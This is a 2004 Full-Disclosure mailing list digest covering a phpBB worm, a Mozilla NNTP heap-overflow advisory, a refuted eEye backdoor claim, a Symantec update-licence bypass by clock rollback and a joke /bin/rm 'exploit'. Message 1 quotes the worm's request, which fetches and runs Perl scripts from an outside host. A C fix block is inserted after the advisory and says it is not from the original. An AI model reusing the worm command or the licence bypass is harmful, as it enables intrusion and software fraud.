Full Disclosure mailing list archives
[Full-Disclosure] RE: Full-disclosure Digest, Vol 1, Issue 2144
From: <steve.dangerfield () syntegra com>
Date: Thu, 30 Dec 2004 15:34:13 -0000
Please unsubscribe me from this list
-----Original Message-----
From: full-disclosure-request () lists netsys com [mailto:full-disclosure-request () lists netsys com]
Sent: 30 December 2004 03:26
To: full-disclosure () lists netsys com
Subject: Full-disclosure Digest, Vol 1, Issue 2144
Send Full-Disclosure mailing list submissions to
full-disclosure () lists netsys com
To subscribe or unsubscribe via the World Wide Web, visit
https://lists.netsys.com/mailman/listinfo/full-disclosure
or, via email, send a message with subject or body 'help' to
full-disclosure-request () lists netsys com
You can reach the person managing the list at
full-disclosure-owner () lists netsys com
When replying, please edit your Subject line so it is more specific than
"Re: Contents of Full-Disclosure digest..."
Today's Topics:
1. Re: Re: new phpBB worm affects 2.0.11 (Paul Laudanski)
2. Re: Again: zone transfers, a spammer's dream? (Jorrit Kronjee)
3. Re: Suspect phpBB users (Ron Brogden)
4. Re: And you're proud of this Mike Evanchick? (Michael Reilly)
5. Heap overflow in Mozilla Browser <= 1.7.3 NNTP code. (Maurycy Prodeus)
6. Re: And you're proud of this Mike Evanchick? (Ill will)
7. Re: And you're proud of this Mike Evanchick? (Michael Evanchik)
8. Is that your password? (psirt () cisco com)
9. Re: more: Isecom, osstm related: CRG was busted yesterday (Crg)
10. RE: Multiple Backdoors found in eEye Products (IRISand SecureIIS) (Marc Maiffret)
11. Trivial Bug in Symantec Security Products (J. Oquendo)
12. /bin/rm file access vulnerability (Lennart Hansen)
13. Re: Multiple Backdoors found in eEye Products (IRIS and Secure (Lance Gusto)
14. Re: /bin/rm file access vulnerability (Sean Harlow)
15. MDKSA-2004:159 - Updated glibc packages fix temporary file vulnerability (Mandrake Linux Security Team)
----------------------------------------------------------------------
Message: 1
Date: Wed, 29 Dec 2004 12:42:42 -0500 (EST)
From: Paul Laudanski <zx () castlecops com>
Subject: Re: [Full-disclosure] Re: new phpBB worm affects 2.0.11
To: Adam <adam () fazed org>
Cc: bugtraq () securityfocus com, full-disclosure () lists netsys com
Message-ID: <Pine.LNX.4.44.0412291241030.25738-100000 () bugsbunny castlecops com>
Content-Type: TEXT/PLAIN; charset=US-ASCII
Here are some samples of what this one does, and some statistics on 300,000 hits in 55 hours:
http://castlecops.com/article-5642-nested-0-0.html
On Sat, 25 Dec 2004, Adam wrote:
The request for this one (even against a non phpBB scripts) appears to look like this: "GET
/?p=comments&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20 crowklan.mine.nu/~pillar/.zk/coll;perl%20coll;wget%20crowklan.mine.nu/~pillar /.zk/aol;perl%20aol;rm%20-rf%20aol.*;rm%20-rf%20coll*%3B%20%65%63%68%6F%20%5F %45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47 %45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527
HTTP/1.1"
--
Regards,
Paul Laudanski - Computer Cops, LLC. CEO & Founder
CastleCops(SM) - http://castlecops.com
Promoting education and health in online security and privacy.
------------------------------
Message: 2
Date: Wed, 29 Dec 2004 19:49:46 +0100
From: Jorrit Kronjee <full-disclosure () nospam wafel org>
Subject: Re: [Full-disclosure] Again: zone transfers, a spammer's dream?
To: bugtraq () securityfocus com, full-disclosure () lists netsys com
Message-ID: <41D2FC4A.60702 () nospam wafel org>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Ralf Glauberman wrote:
Hello all, after Lode Vermeiren published on the 7th of December that many TLDs are transferable I did further research on this. Much to my surprise this wasn't just a problem of little states. I did a complete scan on all TLDs (http://data.iana.org/TLD/tlds-alpha-by-domain.txt) including every SOA and NS server. I got results from 141 out of the 258 checked TLDs. I didn't check every single output, but there are not more than 10 false positives within these. While the ca zone is secure now, I was really surprised that be (~ 42 MB, ~ 900.000 records) and fi (~ 11 MB, ~ 235.000 records) are transferable. All in all, I found that the following TLDs are transferable (also there might be some false positives):
arpa being one of those false positives (it's hardly exploitable by spammers anyway). Although only a few nameservers of the tld allow zone transfers - and you really have to look for them - it really amazes me that these nameservers aren't properly configured. I'm just glad I don't live in any of these countries.
Jorrit
------------------------------
Message: 3
Date: Wed, 29 Dec 2004 10:58:40 -0800
From: Ron Brogden <domains () islandnet com>
Subject: Re: [Full-disclosure] Suspect phpBB users
To: full-disclosure () lists netsys com
Message-ID: <200412291058.40811.domains () islandnet com>
Content-Type: text/plain; charset="iso-8859-1"
On December 25, 2004 15:54, Jack Yan wrote:
We have since upgraded, but among our new users over the last few days have been a Weber361, a Weber395, and a nderevyanko.
This looks like the fallout from a standard run of the mill spam bot. The
point of its actions being to generate as many distinct links back to the
user's site as possible so as to increase their search engine placement.
This is similar to referrer spamming in HTTP logs - just in this case it is
an automated bot spamming forums instead of some other target. I doubt it is
caused by a worm, more likely one or more machines running dedicated software
(though it is possible this is installed on zombie machines I suppose).
Cheers
------------------------------
Message: 4
Date: Wed, 29 Dec 2004 12:50:57 -0800
From: Michael Reilly <michaelr () cisco com>
Subject: Re: [Full-disclosure] And you're proud of this Mike
Evanchick?
To: Todd Towles <toddtowles () brookshires com>
Cc: full-disclosure () lists netsys com
Message-ID: <41D318B1.4070605 () cisco com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Couldn't help seconding this. I do not understand the purpose of the
original message. I think Norton/Symantec did a good job.
michael
Todd Towles wrote:
Sounds like you need AV and a bit of network security. If you are scared
of IRC trojans and detectable viruses..then your time would be better
spent putting those systems into place. Don't you think?
________________________________
From: full-disclosure-bounces () lists netsys com
[mailto:full-disclosure-bounces () lists netsys com] On Behalf Of Elle
Chicka
Sent: Monday, December 27, 2004 11:16 PM
To: full-disclosure () lists netsys com
Subject: [Full-disclosure] And you're proud of this Mike
Evanchick?
You so proudly posted this:
------------------------
http://securityresponse.symantec.com/avcenter/venc/data/trojan.phel.a.html
mike
www.michaelevanchik.com
------------------------
Obviously you are just tickled to see that the kiddies were able
to so quickly turn your point/click sploit code into a virus to wreak
havoc on my network.
Thanks a lot for helping to make all of us a little less secure
over the holidays.
__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com
------------------------------------------------------------------------
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
--
---- ---- ----
Michael Reilly michaelr () cisco com
Cisco Systems, California
------------------------------
Message: 5
Date: Wed, 29 Dec 2004 22:24:21 +0100 (CET)
From: Maurycy Prodeus <z33d () isec pl>
Subject: [Full-disclosure] Heap overflow in Mozilla Browser <= 1.7.3
NNTP code.
To: full-disclosure () lists netsys com
Cc: bugtraq () securityfocus com
Message-ID: <Pine.LNX.4.44.0412292222140.19156-200000 () isec pl>
Content-Type: text/plain; charset="us-ascii"
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Synopsis: Heap overflow in Mozilla Browser <= 1.7.3 NNTP code.
Product: Mozilla Browser
Version: <= 1.7.3
Vendor: http://www.mozilla.org/
URL: http://isec.pl/vulnerabilities/isec-0020-mozilla.txt
CVE: not assigned
Author: Maurycy Prodeus <z33d () isec pl>
Date: Dec 29, 2004
Issue:
======
A critical security vulnerability has been found in Mozilla Project code
handling NNTP protocol.
Details:
========
Mozilla browser supports NNTP urls. Remote side is able to trigger news://
connection to any server. I found a flaw in NNTP handling code which may
cause heap overflow and allow remote attacker to execute arbitrary code on
client machine.
Buggy function from nsNNTPProtocol.cpp:
char *MSG_UnEscapeSearchUrl (const char *commandSpecificData)
{
  char *result = (char*) PR_Malloc (PL_strlen(commandSpecificData) + 1);
  if (result)
  {
    char *resultPtr = result;
    while (1)
    {
      char ch = *commandSpecificData++;
      if (!ch)
        break;
      if (ch == '\\')
      {
        char scratchBuf[3];
        scratchBuf[0] = (char) *commandSpecificData++;
        scratchBuf[1] = (char) *commandSpecificData++;
        scratchBuf[2] = '\0';
        int accum = 0;
        PR_sscanf(scratchBuf, "%X", &accum);
        *resultPtr++ = (char) accum;
      }
      else
        *resultPtr++ = ch;
    }
    *resultPtr = '\0';
  }
  return result;
}
When commandSpecificData points to the last character (the next byte is NUL)
and that character is '\\', the copying loop can skip the terminator of the
source char array and overflow the result buffer.
Affected Versions
=================
Mozilla Browser <= 1.7.3 with mozilla-mail
Solution
=========
This bug is fixed in Mozilla 1.7.5. (Bug 264388)
Mozilla developer Dan Veditz claims that it is not exploitable:
"A '\' on the end will certainly trash memory, but at that point you're no
longer reading attacker-supplied data;".
On my RedHat 9.0 with Mozilla 1.7.3, the attached proof of concept code
overflows the buffer using attacker-supplied data. I decided to make this
bug public because the Mozilla Team hasn't warned users.
Exploitation
============
I have attached a proof of concept HTML file which causes heap corruption
and crashes the Mozilla 1.7.3 browser (with mozilla-mail). The news server
must exist and be reachable.
- --
Maurycy Prodeus
iSEC Security Research
http://isec.pl/
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.netsys.com/pipermail/full-disclosure/attachments/20041229/8cbaf9f1/nntp_crash-0001.html
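As an added example (not from the advisory or the Mozilla tree), the same loop rewritten in C so that a trailing backslash can neither read past the source terminator nor write past the strlen+1 allocation, plus a validator that flags exactly the input shape described above; the function names are my own, and copying an incomplete or non-hex escape through literally is a design choice here, not Mozilla's actual fix.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Value of one hex digit, or -1 if c is not a hex digit. */
static int hex_val(unsigned char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Validation: walk the input the way the escape loop does and report
 * whether a backslash is followed by fewer than two bytes before the NUL.
 * That is the shape the original MSG_UnEscapeSearchUrl mishandles: it
 * fills scratchBuf from beyond the terminator and keeps copying. */
int has_truncated_escape(const char *in)
{
    while (*in) {
        if (*in == '\\') {
            if (in[1] == '\0' || in[2] == '\0')
                return 1;
            in += 3;
        } else {
            in++;
        }
    }
    return 0;
}

/* Hardened unescape (hypothetical replacement): "\XX" becomes byte 0xXX;
 * a backslash not followed by two hex digits is copied through as-is.
 * The read pointer never passes the terminator, and every escape turns
 * three input bytes into one output byte, so the output is never longer
 * than the input and the strlen+1 allocation always suffices.
 * Returns NULL on allocation failure; the caller frees the result. */
char *unescape_search_url_safe(const char *in)
{
    size_t len = strlen(in);
    char *out = malloc(len + 1);
    if (!out)
        return NULL;
    char *w = out;
    while (*in) {
        if (*in == '\\' && in[1] != '\0' && in[2] != '\0') {
            int hi = hex_val((unsigned char)in[1]);
            int lo = hex_val((unsigned char)in[2]);
            if (hi >= 0 && lo >= 0) {
                *w++ = (char)((hi << 4) | lo);
                in += 3;
                continue;
            }
        }
        *w++ = *in++;
    }
    *w = '\0';
    return out;
}

/* Helper for checking results: 1 if unescaping `in` yields `expected`. */
int unescape_matches(const char *in, const char *expected)
{
    char *r = unescape_search_url_safe(in);
    int ok = r != NULL && strcmp(r, expected) == 0;
    free(r);
    return ok;
}

int main(void)
{
    /* Constructed inputs: one well-formed escape (\3D is '='), and the
     * dangling-backslash case from the advisory. */
    const char *good = "from\\3Dzeta";
    const char *bad  = "from\\";
    printf("%s -> truncated escape? %d\n", good, has_truncated_escape(good));
    printf("%s -> truncated escape? %d\n", bad, has_truncated_escape(bad));
    char *r = unescape_search_url_safe(good);
    printf("decoded: %s\n", r);
    free(r);
    return 0;
}
```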
------------------------------
Message: 6
Date: Wed, 29 Dec 2004 16:49:59 -0500
From: Ill will <xillwillx () gmail com>
Subject: Re: [Full-disclosure] And you're proud of this Mike
Evanchick?
Cc: full-disclosure () lists netsys com
Message-ID: <47fe50604122913491c574157 () mail gmail com>
Content-Type: text/plain; charset=US-ASCII
quitcher bitchin and get to work
On Wed, 29 Dec 2004 08:48:24 -0600, Todd Towles
<toddtowles () brookshires com> wrote:
Sounds like you need AV and a bit of network security. If you are scared of IRC trojans and detectable viruses..then your time would be better spent putting those systems into place. Don't you think?
________________________________
From: full-disclosure-bounces () lists netsys com [mailto:full-disclosure-bounces () lists netsys com] On Behalf Of Elle Chicka
Sent: Monday, December 27, 2004 11:16 PM
To: full-disclosure () lists netsys com
Subject: [Full-disclosure] And you're proud of this Mike Evanchick?
You so proudly posted this:
------------------------
http://securityresponse.symantec.com/avcenter/venc/data/trojan.phel.a.html
mike
www.michaelevanchik.com
------------------------
Obviously you are just tickled to see that the kiddies were able to so quickly turn your point/click sploit code into a virus to wreak havoc on my network. Thanks a lot for helping to make all of us a little less secure over the holidays.
__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
--
- illwill
http://illmob.org
------------------------------
Message: 7
Date: Wed, 29 Dec 2004 18:02:55 -0500
From: "Michael Evanchik" <Mike () MichaelEvanchik com>
Subject: Re: [Full-disclosure] And you're proud of this Mike Evanchick?
To: "Todd Towles" <toddtowles () brookshires com>, "Elle Chicka" <c1b3r_chick () yahoo com>, <full-disclosure () lists netsys com>
Message-ID: <01a701c4edfa$88578320$6702a8c0 () AlanPickel com>
Content-Type: text/plain; charset="iso-8859-1"
Todd,
Listen, you are so wrong I can't believe you even have the guts to post this. How stupid can you be? Norton or any AVP can easily be fooled. The ActiveX object "ca"+n b"+ +e crea" +ted" like this, code changed around, or even different local code can be used and tada, AVP is fooled. Only a true patch from Microsoft or disabling the help control in the registry is going to stop this. Her concern is wise.
Mike
www.michaelevanchik.com
----- Original Message -----
From: Todd Towles
To: Elle Chicka ; full-disclosure () lists netsys com
Sent: Wednesday, December 29, 2004 9:36 AM
Subject: RE: [Full-disclosure] And you're proud of this Mike Evanchick?
Well, if you have Norton, it couldn't wreak havoc...now could it? Most of the AV companies are now detecting the exploit. This detection response is much faster than most of the other exploits which are wreaking havoc on your network, so it would sound. Nice work to Norton.
----------------------------------------------------------------------------
From: full-disclosure-bounces () lists netsys com [mailto:full-disclosure-bounces () lists netsys com] On Behalf Of Elle Chicka
Sent: Monday, December 27, 2004 11:16 PM
To: full-disclosure () lists netsys com
Subject: [Full-disclosure] And you're proud of this Mike Evanchick?
You so proudly posted this:
------------------------
http://securityresponse.symantec.com/avcenter/venc/data/trojan.phel.a.html
mike
www.michaelevanchik.com
------------------------
Obviously you are just tickled to see that the kiddies were able to so quickly turn your point/click sploit code into a virus to wreak havoc on my network. Thanks a lot for helping to make all of us a little less secure over the holidays.
__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.netsys.com/pipermail/full-disclosure/attachments/20041229/84b8477d/attachment-0001.htm
------------------------------
Message: 8
Date: Wed, 29 Dec 2004 16:10:53 -0800
From: psirt () cisco com
Subject: [Full-disclosure] Is that your password?
To: full-disclosure () lists netsys com
Message-ID: <200412300010.iBU0AqvO028393 () lists netsys com>
Content-Type: text/plain; charset="windows-1252"
I have attached it to this mail.
-------------- next part --------------
A non-text attachment was scrubbed...
Name: pwd02.txt.scr
Type: application/octet-stream
Size: 29568 bytes
Desc: not available
Url : http://lists.netsys.com/pipermail/full-disclosure/attachments/20041229/a40429a2/pwd02.txt-0001.obj
------------------------------
Message: 9
Date: Thu, 30 Dec 2004 01:43:51 +0100
From: "Crg" <crg () digitalsec net>
Subject: Re: [Full-disclosure] more: Isecom, osstm related: CRG was busted yesterday
To: full-disclosure () lists netsys com
Message-ID: <006301c4ee08$d2342bc0$0302a8c0 () sia es>
Content-Type: text/plain; charset="iso-8859-1"
Well, I'm not arrested, seems to be just a hoax for 28th of Dec (it's like 1st April in Spain).
Keep the pr0j3kt alive
Best regards & xmas
Pedro Andujar (Crg)
!dSR - Digital Security Research
http://www.digitalsec.net
----------------------------------------------------------------------------
-------------------------
Author: your_momma () hushmail com
Date: 2004-12-28 02:332004-12-28 01:33 +100UTC
To: full-disclosure
CC:
Subject: [Full-disclosure] Isecom, osstm related: CRG was busted yesterday
Flame wars are always bad wars. Yesterday one of us was busted by police and !dsr homes were abused looking for profit incoming about hacking isecom site. Crg was busted because of his curiosity, his funny way of learning. He's not an enemy, he's harmless, had no weapon, not like the people that took him when he was going to school. Isecom can now be happy, another young boy hanged, time to make more cash with their "hackers high school". At the moment we only know one being arrested and other two under search. Names were not specified, and families are being contacted hardly without any kind of mercy because of christmas time. We're tired of this.. Anger.. War is over.. we're about rolf the whole planet. Stop playing with us!
------------------------------
Message: 10
Date: Wed, 29 Dec 2004 17:33:11 -0800
From: "Marc Maiffret" <mmaiffret () eeye com>
Subject: RE: [Full-disclosure] Multiple Backdoors found in eEye Products (IRISand SecureIIS)
To: "Lance Gusto" <thegusto22 () hotmail com>, <vuln-dev () securityfocus com>, <ntbugtraq () listserv ntbugtraq com>, <bugs () securitytracker com>, <full-disclosure () lists netsys com>, <news-editor () securityfocus com>, <press () net-security org>
Message-ID: <19F34051C5BB60429ACD1BF01338C598E9A975 () av-mail01 corp int-eeye com>
Content-Type: text/plain; charset="us-ascii"
Hi Lance Gusto,
It is really interesting that someone with such a disdain for my company would go out of their way to spam out an email about a supposed backdoor within our products, choose not to contact us ahead of time, and then provide no real details to prove your claim... Ahhh but wait, you chose not to provide any details because you're a "good guy". As you said:
"Unfortunately, we can't release the "exploits" publicly due to the severity of these flaws."
Right. The reason you could not provide any real details about these backdoors is because there are no backdoors in Iris nor SecureIIS. While I would not wish to give someone like you the time of day nor 15 minutes of infamy, eEye does take every security claim very seriously. We have performed an audit of SecureIIS and Iris code to re-verify what we already knew, that there are no backdoors in either of them.
It is quite possible that you downloaded fake warez versions of our products from peer-to-peer networks which someone might have put there to trick people and put backdoors on their systems. However, if such warez product versions existed they would not be from eEye as we do not distribute our software on peer-to-peer networks nor recommend people downloading warez versions from there. Get your warez from a trusted distributor. ;-)
If you would have contacted us we could have saved you the embarrassment...
But then you are sending emails from Hotmail through a proxy at a university in Germany so I seriously doubt you care if your persona "Lance Gusto" gets embarrassed on public mailing lists. These backdoors are as much of a reality as Santa Claus but then you seem to be childish enough that you probably still believe in the jolly red man. Maybe next you can follow-up your humorous eMail with a spoofed advisory about a backdoor you found in Rudolph "the red nosed reindeer". At least then you could promote yourself from being a coward to a comedian.
Thank you, please drive through.
Signed,
Marc Maiffret
Chief Hacking Officer
eEye Digital Security
T.949.349.9062 F.949.349.9538
http://eEye.com/Blink - End-Point Vulnerability Prevention
http://eEye.com/Retina - Network Security Scanner
http://eEye.com/Iris - Network Traffic Analyzer
http://eEye.com/SecureIIS - Stop known and unknown IIS vulnerabilities
Important Notice: This email is confidential, may be legally privileged, and is for the intended recipient only. Access, disclosure, copying, distribution, or reliance on any of it by anyone else is prohibited and may be a criminal offense. Please delete if obtained in error and email confirmation to the sender.
P.S. I'm going to tell you this for your own benefit, your email was dope as hell especially since you faked 90 percent of it. What you need to do is practice on your freestyle before you come up missing like triple m's police file.
| -----Original Message-----
| From: full-disclosure-bounces () lists netsys com [mailto:full-disclosure-bounces () lists netsys com] On Behalf Of Lance Gusto
| Sent: Tuesday, December 28, 2004 8:12 PM
| To: vuln-dev () securityfocus com; ntbugtraq () listserv ntbugtraq com; bugs () securitytracker com; full-disclosure () lists netsys com; news-editor () securityfocus com; press () net-security org
| Subject: [Full-disclosure] Multiple Backdoors found in eEye Products (IRISand SecureIIS)
|
| Multiple Backdoors found in eEye Products (IRIS and SecureIIS)
| L. Gusto <thegusto22 () hotmail com>
|
| Summary:
|
| During meticulous testing of both eEye's IRIS and SecureIIS products, we (my testing team) have discovered multiple backdoors in the latest of both mentioned products and some older versions we could acquire.
|
| These backdoors are very cleverly hidden (kudos to the authors), I personally don't condone illegally backdooring commercial products, and personally I don't think much of eEye but I must give credit to where credit is due.
|
| We have tested IRIS 3.7 and up; they all appear to have a backdoor.
| We have verified the IRIS backdoor doesn't exist in versions prior to 3.0
|
| We have tested SecureIIS 2.0 and up; they all appear to have a backdoor.
| We have verified that the SecureIIS 1.x series does not have this specific backdoor.
|
| Bringing the backdoors to light:
|
| After long testing we discovered the exact sequences used to activate the backdoor. Unfortunately, we can't release the "exploits" publicly due to the severity of these flaws. But incomplete examples will be given.
|
| The IRIS Backdoor:
|
| This one is quite interesting. We have discovered that sending a specifically crafted UDP datagram to an IRIS host *directly* (not through the wire or to a host on the network segment) with certain IP options set and a certain magic value at an undisclosed offset in the payload will bind a shell to the source port specified in the UDP datagram.
|
| [snip]
|
| The SecureIIS Backdoor:
|
| The SecureIIS backdoor was a lot easier to discover but very well placed. The SecureIIS backdoor is triggered by a specifically crafted HTTP HEAD request. Here is an incomplete layout of how to exploit this:
|
| HEAD /<24 byte constant string>/PORT_ADDRESS.ASP HTTP/1.1
|
| PORT - Will be the port to bind a shell.
| ADDRESS - Address for priority binding (0 - For any).
|
| [snip]
|
| Local Deduction:
|
| There are two possibilities here, either eEye's code has been altered by some attacker or this has been sanctioned by the company (or at least the developers were fully aware of this).
|
| Conclusion:
|
| It is very very shameful that a somewhat reputable like eEye is acting in a very childish, unprofessional manner. I figure that is why the code is closed source. There are several active exploits available that I (the author of this advisory) didn't create floating around. The only logical solution will be to not use the mentioned eEye products for the time being or at least downgrade to the non-backdoored versions.
|
| We will be investigating eEye's Blink Product for any clandestine backdoors.
|
| _________________________________________________________________
| FREE pop-up blocking with the new MSN Toolbar - get it now!
| http://toolbar.msn.click-url.com/go/onm00200415ave/direct/01/
|
| _______________________________________________
| Full-Disclosure - We believe in it.
| Charter: http://lists.netsys.com/full-disclosure-charter.html
|
------------------------------
Message: 11
Date: Wed, 29 Dec 2004 17:56:28 -0500 (EST)
From: "J. Oquendo" <sil () infiltrated net>
Subject: [Full-disclosure] Trivial Bug in Symantec Security Products
To: full-disclosure () lists netsys com
Message-ID: <Pine.GSO.4.58.0412291754080.9648 () kungfunix net>
Content-Type: TEXT/PLAIN; charset=US-ASCII
Impact: Bug in Symantec products allows for free software updates
Version(s):
Norton AntiVirus for Windows 9x/NT/Me/2000/XP
Symantec Web Security
Symantec AntiVirus Scan Engine
Norton AntiVirus for Gateways
Symantec AntiVirus for Gateways
Norton AntiVirus Corporate Edition
Symantec AntiVirus Corporate Edition
Norton AntiVirus for Exchange
I. BACKGROUND
Symantec, whose stock price of $27.38 at market close on December 15, 2004 values the company at approximately $13.5 billion (according to their home page), has a simple little glitch in the above mentioned products, which would allow any user who has an expired product to automatically continue updating without purchasing the software after the program has expired.
Vendor notified on 12/06/2004
II. DESCRIPTION
Any user with an expired copy of the versions listed above can continue to receive updates at no extra cost. While not a true to form "bug", the silly workaround can hinder Symantec's future market valuations if users simply allowed their products to expire, downloaded any "Intelligent Updater" definitions via http://securityresponse.symantec.com/avcenter/defs.download.html and installed them with the clock turned back to a pre-expiration date. Somehow, Symantec engineers have not implemented a mechanism to disallow a user from installing the patches via changing the date on their computer back to when the original program was installed and then running the "Intelligent Updater."
E.g.:
User installs a 60 day trial version with free updates that expires on Jan 01, 2005.
User goes to install an update in July 2005 and gets a subscription error.
User changes the date back to some time before the product expired and installs the new definition without problems.
User changes the date forward again without problems.
While not of the "Bugtraq" typical bug, Symantec engineers should try to resolve this to avoid any future revenue loss.
III SOLUTION
Symantec could rewrite their updates to include a timer, or check via atomic clock. Other options include informing their customers not to commit the evil act of modifying the dates on their computers.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
GPG Key ID 0x51F9D78D
Fingerprint 2A48 BA18 1851 4C99 CA22 0619 DB63 F2F7 51F9 D78D
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x51F9D78D
sil @ politrix . org http://www.politrix.org
sil @ infiltrated . net http://www.infiltrated.net
"How can we account for our present situation unless we believe that men high in this government are concerting to deliver us to disaster?" Joseph McCarthy "America's Retreat from Victory"
------------------------------
Message: 12
Date: Wed, 29 Dec 2004 20:18:25 -0500
From: "Lennart Hansen" <xenzeo () gardener com>
Subject: [Full-disclosure] /bin/rm file access vulnerability
To: full-disclosure () lists netsys com
Message-ID: <20041230011825.21A116EEF6 () ws1-5 us4 outblaze com>
Content-Type: text/plain; charset="iso-8859-1"
/bin/rm file access vulnerability
Affected Products:
/bin/rm (all versions, tested on FreeBSD and Linux)
(http://www.freebsd.org http://www.kernel.org)
Author:
Xenzeo (Ablazed, Ultralaser, Lennart A. Hansen)
xenzeo at blackhat dot dk
/bin/rm is a program that removes the named file arguments on Unix systems. When /bin/rm is called it checks the file's permissions and the id of the user trying to remove the file. If the user does not have the required permissions to delete the file, /bin/rm will simply reject and exit. However, it is possible for a person with admin rights (root) to delete _any_ file on the system regardless of who has created it and what its permissions are.
Proof of concepts:
$ touch /home/xenzeo/file
$ ls -l /home/xenzeo/file
-rw-r--r-- 1 xenzeo none 0 Dec 30 2004 /home/xenzeo/file
$ id
uid=1000(xenzeo) gid=513(none) groups=513(none),545(users)
$ su -c 'rm -f /home/xenzeo/file'
$ ls -l /home/xenzeo/file
ls: file: No such file or directory
#!/usr/bin/perl
if ($#ARGV != 0) {
    die "usage: rm-exploit.pl file\r\n";
} else {
    $file = $ARGV[0];
    print "*** CMD: [ /bin/rm -f $file ]\r\n";
    print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
    if ($> == 0) {
        print "[-] EXECUTING CMD\r\n";
        system("/bin/rm -f $file");
        print "[-] DONE\r\n";
        print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
        exit();
    } else {
        print "[-] EXPLOIT FAILED\r\n";
        print "[-] YOU ARE NOT ROOT\r\n";
        print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
    }
}
Vendor status:
Neither FreeBSD nor Linux developers have been contacted yet!
-Xenzeo
--
___________________________________________________________
Sign-up for Ads Free at Mail.com
http://promo.mail.com/adsfreejump.htm
------------------------------
Message: 13
Date: Wed, 29 Dec 2004 21:03:02 +0000
From: "Lance Gusto" <thegusto22 () hotmail com>
Subject: Re: [Full-disclosure] Multiple Backdoors found in eEye Products (IRIS and Secure
To: dave () immunitysec com, full-disclosure () lists netsys com
Message-ID: <BAY2-F347D60BC3A6AB7882C2046CC9B0 () phx gbl>
Content-Type: text/plain; format=flowed
Hey Dave,
I cannot disclose much information (based on request/threats made by certain organizations who may be involved); I am sure you can understand. But we have tested Iris versions 3.0 and up ... As I previously stated it doesn't appear to exist in the 2.x series of Iris. I am not the main tester involved here, but I was told that there is some sort of clandestine chaining mechanism to create the processes I believe. I will provide the "lists" I have sent this to with more information as soon as some of the other testers involved come back from their respective holiday breaks.
From: Dave Aitel <dave () immunitysec com>
To: Lance Gusto <thegusto22 () hotmail com>
Subject: Re: [Full-disclosure] Multiple Backdoors found in eEye Products (IRIS and SecureIIS)
Date: Wed, 29 Dec 2004 11:29:55 -0500
The SecureIIS Backdoor: The SecureIIS backdoor was a lot easier to discover but very well placed. The SecureIIS backdoor is triggered by a specifically crafted HTTP HEAD request. Here is an incomplete layout of how to exploit this:
Which version did you test? I'm not seeing it, or any intermodular calls to CreateProcess in the DLL that it loads up.
-dave
HEAD /<24 byte constant string>/PORT_ADDRESS.ASP HTTP/1.1
PORT - Will be the port to bind a shell.
ADDRESS - Address for priority binding (0 - For any).
[snip]
Local Deduction: There are two possibilities here, either eEye's code has been altered by some attacker or this has been sanctioned by the company (or at least the developers were fully aware of this).
Conclusion: It is very very shameful that a somewhat reputable like eEye is acting in a very childish, unprofessional manner. I figure that is why the code is closed source. There are several active exploits available that I (the author of this advisory) didn't create floating around. The only logical solution will be to not use the mentioned eEye products for the time being or at least downgrade to the non-backdoored versions.
We will be investigating eEye's Blink Product for any clandestine backdoors.
_________________________________________________________________
FREE pop-up blocking with the new MSN Toolbar - get it now!
http://toolbar.msn.click-url.com/go/onm00200415ave/direct/01/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
------------------------------
Message: 14
Date: Wed, 29 Dec 2004 21:17:12 -0500
From: Sean Harlow <sharlow () UTNet UToledo Edu>
Subject: Re: [Full-disclosure] /bin/rm file access vulnerability
To: full-disclosure () lists netsys com
Message-ID: <41D36528.1070308 () utnet utoledo edu>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Is this a joke? root can delete any file... isn't that the point of being root? The fact that you can do anything with the system, regardless of permissions?
-Sean
Lennart Hansen wrote:
/bin/rm file access vulnerability
Affected Products:
/bin/rm (all versions, tested on FreeBSD and linux)
(http://www.freebsd.org http://www.kernel.org)
Author:
Xenzeo (Ablazed, Ultralaser, Lennart A. Hansen)
xenzeo at blackhat dot dk
/bin/rm is a program that removes the named file arguments on unix systems.
When /bin/rm is called it checks the file's permissions and the id of the user
trying to remove the file. If the user does not have the required permissions
to delete the file, /bin/rm will simply reject and exit. However, it is possible
for a person with admin rights (root) to delete _any_ file on the system
regardless of who has created it and what its permissions are.
Proof of concept:
$ touch /home/xenzeo/file
$ ls -l /home/xenzeo/file
-rw-r--r-- 1 xenzeo none 0 Dec 30 2004 /home/xenzeo/file
$ id
uid=1000(xenzeo) gid=513(none) groups=513(none),545(users)
$ su -c 'rm -f /home/xenzeo/file'
$ ls -l /home/xenzeo/file
ls: file: No such file or directory
#!/usr/bin/perl
# Takes exactly one argument: the file to remove.
if ($#ARGV != 0) {
    die "usage: rm-exploit.pl file\r\n";
} else {
    $file = $ARGV[0];
    print "*** CMD: [ /bin/rm -f $file ]\r\n";
    print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
